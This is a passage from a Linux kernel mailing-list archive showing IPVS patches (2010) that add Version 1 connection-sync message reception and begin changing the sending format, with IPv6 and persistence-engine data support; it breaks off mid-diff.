+	/* ip_vs_sync_conn entries start here */
+};
+
 /* the maximum length of sync (sending/receiving) message */
 static int sync_send_mesg_maxlen;
 static int sync_recv_mesg_maxlen;
@@ -239,7 +369,7 @@ get_curr_sync_buff(unsigned long time)
 void ip_vs_sync_conn(const struct ip_vs_conn *cp)
 {
 	struct ip_vs_sync_mesg *m;
-	struct ip_vs_sync_conn *s;
+	struct ip_vs_sync_conn_v0 *s;
 	int len;
 
 	spin_lock(&curr_sb_lock);
@@ -254,7 +384,7 @@ void ip_vs_sync_conn(const struct ip_vs_conn *cp)
 	len = (cp->flags & IP_VS_CONN_F_SEQ_MASK) ? FULL_CONN_SIZE :
 		SIMPLE_CONN_SIZE;
 	m = curr_sb->mesg;
-	s = (struct ip_vs_sync_conn *)curr_sb->head;
+	s = (struct ip_vs_sync_conn_v0 *)curr_sb->head;
 
 	/* copy members */
 	s->protocol = cp->protocol;
@@ -306,7 +436,7 @@ ip_vs_conn_fill_param_sync(int af, int protocol,
 static void ip_vs_process_message(char *buffer, const size_t buflen)
 {
 	struct ip_vs_sync_mesg *m = (struct ip_vs_sync_mesg *)buffer;
-	struct ip_vs_sync_conn *s;
+	struct ip_vs_sync_conn_v0 *s;
 	struct ip_vs_sync_conn_options *opt;
 	struct ip_vs_conn *cp;
 	struct ip_vs_protocol *pp;
@@ -343,7 +473,7 @@ static void ip_vs_process_message(char *buffer, const size_t buflen)
 			IP_VS_ERR_RL("bogus conn in sync message\n");
 			return;
 		}
-		s = (struct ip_vs_sync_conn *) p;
+		s = (struct ip_vs_sync_conn_v0 *) p;
 		flags = ntohs(s->flags) | IP_VS_CONN_F_SYNC;
 		flags &= ~IP_VS_CONN_F_HASHED;
 		if (flags & IP_VS_CONN_F_SEQ_MASK) {
@@ -849,7 +979,7 @@ int start_sync_thread(int state, char *mcast_ifn, __u8 syncid)
 
 	IP_VS_DBG(7, "%s(): pid %d\n", __func__, task_pid_nr(current));
 	IP_VS_DBG(7, "Each ip_vs_sync_conn entry needs %Zd bytes\n",
-		  sizeof(struct ip_vs_sync_conn));
+		  sizeof(struct ip_vs_sync_conn_v0));
 
 	if (state == IP_VS_STATE_MASTER) {
 		if (sync_master_thread)
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 6/8] IPVS: Backup, Adding Version 1 receive capability
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

Functionality improvements
 * flags  changed from 16 to 32 bits
 * fwmark added (32 bits)
 * timeout in sec. added (32 bits)
 * pe data added (Variable length)
 * IPv6 capabilities (3x16 bytes for addr.)
 * Version and type in every conn msg.

ip_vs_process_message() now handles Version 1 messages
and will call ip_vs_process_message_v0() for version 0 messages.

ip_vs_proc_conn() is common for both version, and handles the update of
connection hash.

ip_vs_conn_fill_param_sync()    - Version 1 messages only
ip_vs_conn_fill_param_sync_v0() - Version 0 messages only

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 include/linux/ip_vs.h           |    8 +
 include/net/ip_vs.h             |    1 +
 net/netfilter/ipvs/ip_vs_pe.c   |    5 +-
 net/netfilter/ipvs/ip_vs_sync.c |  549 ++++++++++++++++++++++++++++++---------
 4 files changed, 440 insertions(+), 123 deletions(-)

diff --git a/include/linux/ip_vs.h b/include/linux/ip_vs.h
index 5f43a3b..4deb383 100644
--- a/include/linux/ip_vs.h
+++ b/include/linux/ip_vs.h
@@ -89,6 +89,14 @@
 #define IP_VS_CONN_F_TEMPLATE	0x1000		/* template, not connection */
 #define IP_VS_CONN_F_ONE_PACKET	0x2000		/* forward only one packet */
 
+#define IP_VS_CONN_F_BACKUP_MASK (IP_VS_CONN_F_FWD_MASK | \
+				  IP_VS_CONN_F_NOOUTPUT | \
+				  IP_VS_CONN_F_INACTIVE | \
+				  IP_VS_CONN_F_SEQ_MASK | \
+				  IP_VS_CONN_F_NO_CPORT | \
+				  IP_VS_CONN_F_TEMPLATE \
+				 )
+
 /* Flags that are not sent to backup server start from bit 16 */
 #define IP_VS_CONN_F_NFCT	(1 << 16)	/* use netfilter conntrack */
 
diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
index 890f01c..4069484 100644
--- a/include/net/ip_vs.h
+++ b/include/net/ip_vs.h
@@ -817,6 +817,7 @@ void ip_vs_unbind_pe(struct ip_vs_service *svc);
 int register_ip_vs_pe(struct ip_vs_pe *pe);
 int unregister_ip_vs_pe(struct ip_vs_pe *pe);
 struct ip_vs_pe *ip_vs_pe_getbyname(const char *name);
+struct ip_vs_pe *__ip_vs_pe_getbyname(const char *pe_name);
 
 static inline void ip_vs_pe_get(const struct ip_vs_pe *pe)
 {
diff --git a/net/netfilter/ipvs/ip_vs_pe.c b/net/netfilter/ipvs/ip_vs_pe.c
index e99f920..5cf859c 100644
--- a/net/netfilter/ipvs/ip_vs_pe.c
+++ b/net/netfilter/ipvs/ip_vs_pe.c
@@ -29,12 +29,11 @@ void ip_vs_unbind_pe(struct ip_vs_service *svc)
 }
 
 /* Get pe in the pe list by name */
-static struct ip_vs_pe *
-__ip_vs_pe_getbyname(const char *pe_name)
+struct ip_vs_pe *__ip_vs_pe_getbyname(const char *pe_name)
 {
 	struct ip_vs_pe *pe;
 
-	IP_VS_DBG(2, "%s(): pe_name \"%s\"\n", __func__,
+	IP_VS_DBG(10, "%s(): pe_name \"%s\"\n", __func__,
 		  pe_name);
 
 	spin_lock_bh(&ip_vs_pe_lock);
diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
index 566482f..e071508 100644
--- a/net/netfilter/ipvs/ip_vs_sync.c
+++ b/net/netfilter/ipvs/ip_vs_sync.c
@@ -35,6 +35,8 @@
 #include <linux/wait.h>
 #include <linux/kernel.h>
 
+#include <asm/unaligned.h>		/* Used for ntoh_seq and hton_seq */
+
 #include <net/ip.h>
 #include <net/sock.h>
 
@@ -286,6 +288,16 @@ static struct sockaddr_in mcast_addr = {
 	.sin_addr.s_addr	= cpu_to_be32(IP_VS_SYNC_GROUP),
 };
 
+/*
+ * Copy of struct ip_vs_seq
+ * From unaligned network order to aligned host order
+ */
+static void ntoh_seq(struct ip_vs_seq *no, struct ip_vs_seq *ho)
+{
+	ho->init_seq       = get_unaligned_be32(&no->init_seq);
+	ho->delta          = get_unaligned_be32(&no->delta);
+	ho->previous_delta = get_unaligned_be32(&no->previous_delta);
+}
 
 static inline struct ip_vs_sync_buff *sb_dequeue(void)
 {
@@ -418,59 +430,186 @@ void ip_vs_sync_conn(const struct ip_vs_conn *cp)
 		ip_vs_sync_conn(cp->control);
 }
 
+/*
+ *  fill_param used by version 1
+ */
 static inline int
-ip_vs_conn_fill_param_sync(int af, int protocol,
-			   const union nf_inet_addr *caddr, __be16 cport,
-			   const union nf_inet_addr *vaddr, __be16 vport,
-			   struct ip_vs_conn_param *p)
+ip_vs_conn_fill_param_sync(int af, union ip_vs_sync_conn *sc,
+			   struct ip_vs_conn_param *p,
+			   __u8 *pe_data, unsigned int pe_data_len,
+			   __u8 *pe_name, unsigned int pe_name_len)
 {
-	/* XXX: Need to take into account persistence engine */
-	ip_vs_conn_fill_param(af, protocol, caddr, cport, vaddr, vport, p);
+#ifdef CONFIG_IP_VS_IPV6
+	if (af == AF_INET6)
+		ip_vs_conn_fill_param(af, sc->v6.protocol,
+				      (const union nf_inet_addr *)&sc->v6.caddr,
+				      sc->v6.cport,
+				      (const union nf_inet_addr *)&sc->v6.vaddr,
+				      sc->v6.vport, p);
+	else
+#endif
+		ip_vs_conn_fill_param(af, sc->v4.protocol,
+				      (const union nf_inet_addr *)&sc->v4.caddr,
+				      sc->v4.cport,
+				      (const union nf_inet_addr *)&sc->v4.vaddr,
+				      sc->v4.vport, p);
+	/* Handle pe data */
+	if (pe_data_len) {
+		if (pe_name_len) {
+			char buff[IP_VS_PENAME_MAXLEN+1];
+
+			memcpy(buff, pe_name, pe_name_len);
+			buff[pe_name_len]=0;
+			p->pe = __ip_vs_pe_getbyname(buff);
+			if (!p->pe) {
+				IP_VS_DBG(3, "BACKUP, no %s engine found/loaded\n", buff);
+				return 1;
+			}
+		} else {
+			IP_VS_ERR_RL("BACKUP, Invalid PE parameters\n");
+			return 1;
+		}
+
+		p->pe_data = kmalloc(pe_data_len, GFP_ATOMIC);
+		if (!p->pe_data) {
+			if (p->pe->module)
+				module_put(p->pe->module);
+			return -ENOMEM;
+		}
+		memcpy(p->pe_data, pe_data, pe_data_len);
+		p->pe_data_len = pe_data_len;
+	}
 	return 0;
 }
 
 /*
- *      Process received multicast message and create the corresponding
- *      ip_vs_conn entries.
+ *  Connection Add / Update.
+ *  Common for version 0 and 1 reception of backup sync_conns.
+ *  Param: ...
+ *         timeout is in sec.
+ */
+static void ip_vs_proc_conn(struct ip_vs_conn_param *param,  unsigned flags,
+			    unsigned state, unsigned protocol, unsigned type,
+			    const union nf_inet_addr *daddr, __be16 dport,
+			    unsigned long timeout, __u32 fwmark,
+			    struct ip_vs_sync_conn_options *opt,
+			    struct ip_vs_protocol *pp)
+{
+	struct ip_vs_dest *dest;
+	struct ip_vs_conn *cp;
+
+
+	if (!(flags & IP_VS_CONN_F_TEMPLATE))
+		cp = ip_vs_conn_in_get(param);
+	else
+		cp = ip_vs_ct_in_get(param);
+
+	if (cp && param->pe_data) 	/* Free pe_data */
+		kfree(param->pe_data);
+	if (!cp) {
+		/*
+		 * Find the appropriate destination for the connection.
+		 * If it is not found the connection will remain unbound
+		 * but still handled.
+		 */
+		dest = ip_vs_find_dest(type, daddr, dport, param->vaddr,
+				       param->vport, protocol, fwmark);
+
+		/*  Set the approprite ativity flag */
+		if (protocol == IPPROTO_TCP) {
+			if (state != IP_VS_TCP_S_ESTABLISHED)
+				flags |= IP_VS_CONN_F_INACTIVE;
+			else
+				flags &= ~IP_VS_CONN_F_INACTIVE;
+		} else if (protocol == IPPROTO_SCTP) {
+			if (state != IP_VS_SCTP_S_ESTABLISHED)
+				flags |= IP_VS_CONN_F_INACTIVE;
+			else
+				flags &= ~IP_VS_CONN_F_INACTIVE;
+		}
+		cp = ip_vs_conn_new(param, daddr, dport, flags, dest, fwmark);
+		if (dest)
+			atomic_dec(&dest->refcnt);
+		if (!cp) {
+			if (param->pe_data)
+				kfree(param->pe_data);
+			IP_VS_DBG(2, "BACKUP, add new conn. failed\n");
+			return;
+		}
+	} else if (!cp->dest) {
+		dest = ip_vs_try_bind_dest(cp);
+		if (dest)
+			atomic_dec(&dest->refcnt);
+	} else if ((cp->dest) && (cp->protocol == IPPROTO_TCP) &&
+		(cp->state != state)) {
+		/* update active/inactive flag for the connection */
+		dest = cp->dest;
+		if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
+			(state != IP_VS_TCP_S_ESTABLISHED)) {
+			atomic_dec(&dest->activeconns);
+			atomic_inc(&dest->inactconns);
+			cp->flags |= IP_VS_CONN_F_INACTIVE;
+		} else if ((cp->flags & IP_VS_CONN_F_INACTIVE) &&
+			(state == IP_VS_TCP_S_ESTABLISHED)) {
+			atomic_inc(&dest->activeconns);
+			atomic_dec(&dest->inactconns);
+			cp->flags &= ~IP_VS_CONN_F_INACTIVE;
+		}
+	} else if ((cp->dest) && (cp->protocol == IPPROTO_SCTP) &&
+		(cp->state != state)) {
+		dest = cp->dest;
+		if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
+		(state != IP_VS_SCTP_S_ESTABLISHED)) {
+			atomic_dec(&dest->activeconns);
+			atomic_inc(&dest->inactconns);
+			cp->flags &= ~IP_VS_CONN_F_INACTIVE;
+		}
+	}
+
+	if (opt)
+		memcpy(&cp->in_seq, opt, sizeof(*opt));
+	atomic_set(&cp->in_pkts, sysctl_ip_vs_sync_threshold[0]);
+	cp->state = state;
+	cp->old_state = cp->state;
+	/*
+	 * For Ver 0 messages style
+	 *  - Not possible to recover the right timeout for templates
+	 *  - can not find the right fwmark
+	 *    virtual service. If needed, we can do it for
+	 *    non-fwmark persistent services.
+	 * Ver 1 messages style.
+	 *  - No problem.
+	 */
+	if (timeout) {
+		if (timeout > MAX_SCHEDULE_TIMEOUT / HZ)
+			timeout = MAX_SCHEDULE_TIMEOUT / HZ;
+		cp->timeout = timeout*HZ;
+	} else if (!(flags & IP_VS_CONN_F_TEMPLATE) && pp->timeout_table)
+		cp->timeout = pp->timeout_table[state];
+	else
+		cp->timeout = (3*60*HZ);
+	ip_vs_conn_put(cp);
+}
+
+/*
+ *  Process received multicast message for Version 0
  */
-static void ip_vs_process_message(char *buffer, const size_t buflen)
+static void ip_vs_process_message_v0(const char *buffer, const size_t buflen)
 {
 	struct ip_vs_sync_mesg *m = (struct ip_vs_sync_mesg *)buffer;
 	struct ip_vs_sync_conn_v0 *s;
 	struct ip_vs_sync_conn_options *opt;
-	struct ip_vs_conn *cp;
 	struct ip_vs_protocol *pp;
-	struct ip_vs_dest *dest;
 	struct ip_vs_conn_param param;
 	char *p;
 	int i;
 
-	if (buflen < sizeof(struct ip_vs_sync_mesg)) {
-		IP_VS_ERR_RL("sync message header too short\n");
-		return;
-	}
-
-	/* Convert size back to host byte order */
-	m->size = ntohs(m->size);
-
-	if (buflen != m->size) {
-		IP_VS_ERR_RL("bogus sync message size\n");
-		return;
-	}
-
-	/* SyncID sanity check */
-	if (ip_vs_backup_syncid != 0 && m->syncid != ip_vs_backup_syncid) {
-		IP_VS_DBG(7, "Ignoring incoming msg with syncid = %d\n",
-			  m->syncid);
-		return;
-	}
-
 	p = (char *)buffer + sizeof(struct ip_vs_sync_mesg);
 	for (i=0; i<m->nr_conns; i++) {
 		unsigned flags, state;
 
 		if (p + SIMPLE_CONN_SIZE > buffer+buflen) {
-			IP_VS_ERR_RL("bogus conn in sync message\n");
+			IP_VS_ERR_RL("BACKUP v0, bogus conn\n");
 			return;
 		}
 		s = (struct ip_vs_sync_conn_v0 *) p;
@@ -480,7 +619,7 @@ static void ip_vs_process_message(char *buffer, const size_t buflen)
 			opt = (struct ip_vs_sync_conn_options *)&s[1];
 			p += FULL_CONN_SIZE;
 			if (p > buffer+buflen) {
-				IP_VS_ERR_RL("bogus conn options in sync message\n");
+				IP_VS_ERR_RL("BACKUP v0, Dropping buffer bogus conn options\n");
 				return;
 			}
 		} else {
@@ -492,12 +631,12 @@ static void ip_vs_process_message(char *buffer, const size_t buflen)
 		if (!(flags & IP_VS_CONN_F_TEMPLATE)) {
 			pp = ip_vs_proto_get(s->protocol);
 			if (!pp) {
-				IP_VS_ERR_RL("Unsupported protocol %u in sync msg\n",
+				IP_VS_DBG(2, "BACKUP v0, Unsupported protocol %u\n",
 					s->protocol);
 				continue;
 			}
 			if (state >= pp->num_states) {
-				IP_VS_DBG(2, "Invalid %s state %u in sync msg\n",
+				IP_VS_DBG(2, "BACKUP v0, Invalid %s state %u\n",
 					pp->name, state);
 				continue;
 			}
@@ -505,103 +644,273 @@ static void ip_vs_process_message(char *buffer, const size_t buflen)
 			/* protocol in templates is not used for state/timeout */
 			pp = NULL;
 			if (state > 0) {
-				IP_VS_DBG(2, "Invalid template state %u in sync msg\n",
+				IP_VS_DBG(2, "BACKUP v0, Invalid template state %u\n",
 					state);
 				state = 0;
 			}
 		}
 
-		if (ip_vs_conn_fill_param_sync(AF_INET, s->protocol,
-					       (union nf_inet_addr *)&s->caddr,
-					       s->cport,
-					       (union nf_inet_addr *)&s->vaddr,
-					       s->vport, &param)) {
-			pr_err("ip_vs_conn_fill_param_sync failed");
-			return;
+		ip_vs_conn_fill_param(AF_INET, s->protocol,
+				      (const union nf_inet_addr *)&s->caddr,
+				      s->cport,
+				      (const union nf_inet_addr *)&s->vaddr,
+				      s->vport, &param);
+
+		/* Send timeout as Zero */
+		ip_vs_proc_conn(&param, flags, state, s->protocol, AF_INET,
+				(union nf_inet_addr *)&s->daddr, s->dport,
+				0, 0, opt, pp);
+	}
+}
+
+/*
+ * Handle options
+ */
+static inline int ip_vs_proc_seqopt(__u8 *p, unsigned int plen,
+				    __u32 *opt_flags,
+				    struct ip_vs_sync_conn_options *opt)
+{
+	struct ip_vs_sync_conn_options *topt;
+
+	topt = (struct ip_vs_sync_conn_options *)p;
+
+	if (plen != sizeof(struct ip_vs_sync_conn_options)) {
+		IP_VS_DBG(2, "BACKUP, bogus conn options length\n");
+		return -EINVAL;
+	}
+	if (*opt_flags & IPVS_OPT_F_SEQ_DATA) {
+		IP_VS_DBG(2, "BACKUP, conn options found twice\n");
+		return -EINVAL;
+	}
+	ntoh_seq(&topt->in_seq, &opt->in_seq);
+	ntoh_seq(&topt->out_seq, &opt->out_seq);
+	*opt_flags |= IPVS_OPT_F_SEQ_DATA;
+	return 0;
+}
+
+static int ip_vs_proc_str(__u8 *p, unsigned int plen, unsigned int *data_len,
+			  __u8 **data, unsigned int maxlen,
+			  __u32 *opt_flags, __u32 flag)
+{
+	if (plen > maxlen) {
+		IP_VS_DBG(2, "BACKUP, bogus par.data len > %d\n", maxlen);
+		return -EINVAL;
+	}
+	if (*opt_flags & flag) {
+		IP_VS_DBG(2, "BACKUP, Par.data found twice 0x%x\n", flag);
+		return -EINVAL;
+	}
+	*data_len = plen;
+	*data = p;
+	*opt_flags |= flag;
+	return 0;
+}
+/*
+ *   Process a Version 1 sync. connection
+ */
+static inline int ip_vs_proc_sync_conn(__u8 *p, __u8 *msg_end)
+{
+	struct ip_vs_sync_conn_options opt;
+	union  ip_vs_sync_conn *s;
+	struct ip_vs_protocol *pp;
+	struct ip_vs_conn_param param;
+	__u32 flags;
+	unsigned int af, state, pe_data_len=0, pe_name_len=0;
+	__u8 *pe_data=NULL, *pe_name=NULL;
+	__u32 opt_flags=0;
+	int retc=0;
+
+	s = (union ip_vs_sync_conn *) p;
+
+	if (s->v6.type & STYPE_F_INET6) {
+#ifdef CONFIG_IP_VS_IPV6
+		af = AF_INET6;
+		p += sizeof(struct ip_vs_sync_v6);
+#else
+		IP_VS_DBG(3,"BACKUP, IPv6 msg received, and IPVS is not compiled for IPv6\n");
+		retc = 10;
+		goto out;
+#endif
+	} else if (!s->v4.type) {
+		af = AF_INET;
+		p += sizeof(struct ip_vs_sync_v4);
+	} else {
+		return -10;
+	}
+	if (p > msg_end)
+		return -20;
+
+	/* Process optional params check Type & Len. */
+	while (p < msg_end) {
+		int ptype;
+		int plen;
+
+		if (p+2 > msg_end)
+			return -30;
+		ptype = *(p++);
+		plen  = *(p++);
+
+		if (!plen || ((p + plen) > msg_end))
+			return -40;
+		/* Handle seq option  p = param data */
+		switch (ptype & ~IPVS_OPT_F_PARAM) {
+		case IPVS_OPT_SEQ_DATA:
+			if (ip_vs_proc_seqopt(p, plen, &opt_flags, &opt))
+				return -50;
+			break;
+
+		case IPVS_OPT_PE_DATA:
+			if (ip_vs_proc_str(p, plen, &pe_data_len, &pe_data,
+					   IP_VS_PEDATA_MAXLEN, &opt_flags,
+					   IPVS_OPT_F_PE_DATA))
+				return -60;
+			break;
+
+		case IPVS_OPT_PE_NAME:
+			if (ip_vs_proc_str(p, plen,&pe_name_len, &pe_name,
+					   IP_VS_PENAME_MAXLEN, &opt_flags,
+					   IPVS_OPT_F_PE_NAME))
+				return -70;
+			break;
+
+		default:
+			/* Param data mandatory ? */
+			if (!(ptype & IPVS_OPT_F_PARAM)) {
+				IP_VS_DBG(3, "BACKUP, Unknown mandatory param %d found\n",
+					  ptype & ~IPVS_OPT_F_PARAM);
+				retc = 20;
+				goto out;
+			}
 		}
-		if (!(flags & IP_VS_CONN_F_TEMPLATE))
-			cp = ip_vs_conn_in_get(&param);
-		else
-			cp = ip_vs_ct_in_get(&param);
-		if (!cp) {
-			/*
-			 * Find the appropriate destination for the connection.
-			 * If it is not found the connection will remain unbound
-			 * but still handled.
-			 */
-			dest = ip_vs_find_dest(AF_INET,
-					       (union nf_inet_addr *)&s->daddr,
-					       s->dport,
-					       (union nf_inet_addr *)&s->vaddr,
-					       s->vport,
-					       s->protocol, 0);
-			/*  Set the approprite ativity flag */
-			if (s->protocol == IPPROTO_TCP) {
-				if (state != IP_VS_TCP_S_ESTABLISHED)
-					flags |= IP_VS_CONN_F_INACTIVE;
-				else
-					flags &= ~IP_VS_CONN_F_INACTIVE;
-			} else if (s->protocol == IPPROTO_SCTP) {
-				if (state != IP_VS_SCTP_S_ESTABLISHED)
-					flags |= IP_VS_CONN_F_INACTIVE;
-				else
-					flags &= ~IP_VS_CONN_F_INACTIVE;
+		p += plen;  /* Next option */
+	}
+
+	/* Get flags and Mask off unsupported */
+	flags  = ntohl(s->v4.flags) & IP_VS_CONN_F_BACKUP_MASK;
+	flags |= IP_VS_CONN_F_SYNC;
+	state = ntohs(s->v4.state);
+
+	if (!(flags & IP_VS_CONN_F_TEMPLATE)) {
+		pp = ip_vs_proto_get(s->v4.protocol);
+		if (!pp) {
+			IP_VS_DBG(3,"BACKUP, Unsupported protocol %u\n",
+				s->v4.protocol);
+			retc = 30;
+			goto out;
+		}
+		if (state >= pp->num_states) {
+			IP_VS_DBG(3, "BACKUP, Invalid %s state %u\n",
+				pp->name, state);
+			retc = 40;
+			goto out;
+		}
+	} else {
+		/* protocol in templates is not used for state/timeout */
+		pp = NULL;
+		if (state > 0) {
+			IP_VS_DBG(3, "BACKUP, Invalid template state %u\n",
+				state);
+			state = 0;
+		}
+	}
+	if (ip_vs_conn_fill_param_sync(af, s, &param,
+					pe_data, pe_data_len,
+					pe_name, pe_name_len)) {
+		retc = 50;
+		goto out;
+	}
+	/* If only IPv4, just silent skip IPv6 */
+	if (af == AF_INET)
+		ip_vs_proc_conn(&param, flags, state, s->v4.protocol, af,
+				(union nf_inet_addr *)&s->v4.daddr, s->v4.dport,
+				ntohl(s->v4.timeout), ntohl(s->v4.fwmark),
+				(opt_flags & IPVS_OPT_F_SEQ_DATA ? &opt : NULL),
+				pp);
+#ifdef CONFIG_IP_VS_IPV6
+	else
+		ip_vs_proc_conn(&param, flags, state, s->v6.protocol, af,
+				(union nf_inet_addr *)&s->v6.daddr, s->v6.dport,
+				ntohl(s->v6.timeout), ntohl(s->v6.fwmark),
+				(opt_flags & IPVS_OPT_F_SEQ_DATA ? &opt : NULL),
+				pp);
+#endif
+	return 0;
+	/* Error exit */
+out:
+	IP_VS_DBG(2, "BACKUP, Single msg dropped err:%d\n", retc);
+	return retc;
+
+}
+/*
+ *      Process received multicast message and create the corresponding
+ *      ip_vs_conn entries.
+ *      Handles Version 0 & 1
+ */
+static void ip_vs_process_message(__u8 *buffer, const size_t buflen)
+{
+	struct ip_vs_sync_mesg_v2 *m2 = (struct ip_vs_sync_mesg_v2 *)buffer;
+	__u8 *p, *msg_end;
+	unsigned int i, nr_conns;
+
+	if (buflen < sizeof(struct ip_vs_sync_mesg)) {
+		IP_VS_DBG(2, "BACKUP, message header too short\n");
+		return;
+	}
+	/* Convert size back to host byte order */
+	m2->size = ntohs(m2->size);
+
+	if (buflen != m2->size) {
+		IP_VS_DBG(2, "BACKUP, bogus message size\n");
+		return;
+	}
+	/* SyncID sanity check */
+	if (ip_vs_backup_syncid != 0 && m2->syncid != ip_vs_backup_syncid) {
+		IP_VS_DBG(7, "BACKUP, Ignoring syncid = %d\n", m2->syncid);
+		return;
+	}
+	/* Handle version 1  message */
+	if ((m2->version == SYNC_PROTO_VER) && (m2->reserved == 0)
+	    && (m2->spare == 0)) {
+
+		msg_end = buffer + sizeof(struct ip_vs_sync_mesg_v2);
+		nr_conns = m2->nr_conns;
+
+		for (i=0; i<nr_conns; i++) {
+			union ip_vs_sync_conn *s;
+			unsigned size;
+			int retc;
+
+			p = msg_end;
+			if (p + sizeof(s->v4) > buffer+buflen) {
+				IP_VS_ERR_RL("BACKUP, Dropping buffer, to small\n");
+				return;
 			}
-			cp = ip_vs_conn_new(&param,
-					    (union nf_inet_addr *)&s->daddr,
-					    s->dport, flags, dest, 0);
-			if (dest)
-				atomic_dec(&dest->refcnt);
-			if (!cp) {
-				pr_err("ip_vs_conn_new failed\n");
+			s = (union ip_vs_sync_conn *)p;
+			size = ntohs(s->v4.ver_size) & SVER_MASK;
+			msg_end = p + size;
+			/* Basic sanity checks */
+			if (msg_end  > buffer+buflen) {
+				IP_VS_ERR_RL("BACKUP, Dropping buffer, msg > buffer\n");
 				return;
 			}
-		} else if (!cp->dest) {
-			dest = ip_vs_try_bind_dest(cp);
-			if (dest)
-				atomic_dec(&dest->refcnt);
-		} else if ((cp->dest) && (cp->protocol == IPPROTO_TCP) &&
-			   (cp->state != state)) {
-			/* update active/inactive flag for the connection */
-			dest = cp->dest;
-			if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
-				(state != IP_VS_TCP_S_ESTABLISHED)) {
-				atomic_dec(&dest->activeconns);
-				atomic_inc(&dest->inactconns);
-				cp->flags |= IP_VS_CONN_F_INACTIVE;
-			} else if ((cp->flags & IP_VS_CONN_F_INACTIVE) &&
-				(state == IP_VS_TCP_S_ESTABLISHED)) {
-				atomic_inc(&dest->activeconns);
-				atomic_dec(&dest->inactconns);
-				cp->flags &= ~IP_VS_CONN_F_INACTIVE;
+			if (ntohs(s->v4.ver_size) >> SVER_SHIFT) {
+				IP_VS_ERR_RL("BACKUP, Dropping buffer, Unknown version %d\n",
+					      ntohs(s->v4.ver_size) >> SVER_SHIFT);
+				return;
 			}
-		} else if ((cp->dest) && (cp->protocol == IPPROTO_SCTP) &&
-			   (cp->state != state)) {
-			dest = cp->dest;
-			if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
-			     (state != IP_VS_SCTP_S_ESTABLISHED)) {
-			    atomic_dec(&dest->activeconns);
-			    atomic_inc(&dest->inactconns);
-			    cp->flags &= ~IP_VS_CONN_F_INACTIVE;
+			/* Process a single sync_conn */
+			if ((retc=ip_vs_proc_sync_conn(p, msg_end)) < 0) {
+				IP_VS_ERR_RL("BACKUP, Dropping buffer, Err: %d in decoding\n",
+					     retc);
+				return;
 			}
+			/* Make sure we have 32 bit alignment */
+			msg_end = p + ((size + 3) & ~3);
 		}
-
-		if (opt)
-			memcpy(&cp->in_seq, opt, sizeof(*opt));
-		atomic_set(&cp->in_pkts, sysctl_ip_vs_sync_threshold[0]);
-		cp->state = state;
-		cp->old_state = cp->state;
-		/*
-		 * We can not recover the right timeout for templates
-		 * in all cases, we can not find the right fwmark
-		 * virtual service. If needed, we can do it for
-		 * non-fwmark persistent services.
-		 */
-		if (!(flags & IP_VS_CONN_F_TEMPLATE) && pp->timeout_table)
-			cp->timeout = pp->timeout_table[state];
-		else
-			cp->timeout = (3*60*HZ);
-		ip_vs_conn_put(cp);
+	} else {
+		/* Old type of message */
+		ip_vs_process_message_v0(buffer, buflen);
+		return;
 	}
 }
 
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 7/8] IPVS: Backup, Change sending to Version 1 format
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

Enable sending and removal of version 0 sending
Affected functions,

ip_vs_sync_buff_create()
ip_vs_sync_conn()

ip_vs_core.c removal of IPv4 check.

*v5
 Just check cp->pe_data_len in ip_vs_sync_conn
 Check if padding needed before adding a new sync_conn
 to the buffer, i.e. avoid sending padding at the end.

*v4
 moved sanity check and pe_name_len after sloop.
 use cp->pe instead of cp->dest->svc->pe
 real length in each sync_conn, not padded length
 however total size of a sync_msg includes padding.

*v3
 Sending ip_vs_sync_conn_options in network order.
 Sending Templates for ONE_PACKET conn.
 Renaming of ip_vs_sync_mesg to ip_vs_sync_mesg_v0

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 include/net/ip_vs.h             |    2 +-
 net/netfilter/ipvs/ip_vs_core.c |   13 ++-
 net/netfilter/ipvs/ip_vs_sync.c |  189 ++++++++++++++++++++++++++++++---------
 3 files changed, 156 insertions(+), 48 deletions(-)

diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
index 4069484..a715f3d 100644
--- a/include/net/ip_vs.h
+++ b/include/net/ip_vs.h
@@ -919,7 +919,7 @@ extern char ip_vs_master_mcast_ifn[IP_VS_IFNAME_MAXLEN];
 extern char ip_vs_backup_mcast_ifn[IP_VS_IFNAME_MAXLEN];
 extern int start_sync_thread(int state, char *mcast_ifn, __u8 syncid);
 extern int stop_sync_thread(int state);
-extern void ip_vs_sync_conn(const struct ip_vs_conn *cp);
+extern void ip_vs_sync_conn(struct ip_vs_conn *cp);
 
 
 /*
diff --git a/net/netfilter/ipvs/ip_vs_core.c b/net/netfilter/ipvs/ip_vs_core.c
index 3445da6..5287771 100644
--- a/net/netfilter/ipvs/ip_vs_core.c
+++ b/net/netfilter/ipvs/ip_vs_core.c
@@ -1560,9 +1560,15 @@ ip_vs_in(unsigned int hooknum, struct sk_buff *skb, int af)
 	 *
 	 * Sync connection if it is about to close to
 	 * encorage the standby servers to update the connections timeout
+	 *
+	 * For ONE_PKT let ip_vs_sync_conn() do the filter work.
 	 */
-	pkts = atomic_add_return(1, &cp->in_pkts);
-	if (af == AF_INET && (ip_vs_sync_state & IP_VS_STATE_MASTER) &&
+	if (cp->flags & IP_VS_CONN_F_ONE_PACKET)
